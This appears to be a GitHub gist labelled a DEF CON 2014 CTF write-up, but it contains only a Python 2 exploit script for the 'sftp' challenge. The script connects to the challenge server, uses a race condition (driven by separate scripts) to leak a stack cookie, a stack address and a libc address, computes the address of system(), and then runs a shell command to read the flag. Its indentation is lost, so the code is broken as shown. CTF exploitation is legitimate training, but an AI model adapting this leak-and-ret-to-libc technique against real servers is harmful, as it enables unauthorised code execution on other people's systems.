Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
DEFCON 2014 Writeup sftp
import time
import socket
from struct import pack, unpack
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p.connect(('sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me', 115))
#p.connect(('localhost', 115))
print p.recv(4096)
p.send("PASS defcon2014\n")
print p.recv(4096)
p.send("KILL a\n")
print p.recv(4096)
p.send("STOR OLD a\n\n")
print p.recv(4096)
p.send("RETR a\n")
print p.recv(4096)
raw_input() # wait launching cause_race1.py
p.send("SEND\n")
s = ""
while len(s) < 1280:
s += p.recv(4096)
print [s]
cookie = unpack("<I", s[0x39c:0x3a0])[0]
stack = unpack("<I", s[0x30:0x34])[0]
__libc_start_main_ret = unpack("<I", s[1276:1280])[0]
system_addr = __libc_start_main_ret - 0x19a83 + 0x00403b0
print "stack:", hex(stack)
print "cookie:", hex(cookie)
print "system:", hex(system_addr)
p.send("KILL a\n")
print p.recv(4096)
p.send("STOR OLD a\n\n")
print p.recv(4096)
p.send("RETR a\n")
print p.recv(4096)
raw_input() # wait launching cause_race2.py
p.send("SEND\n")
p.send("cat /home/sftp/flag\n")
while 1:
print p.recv(4096)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment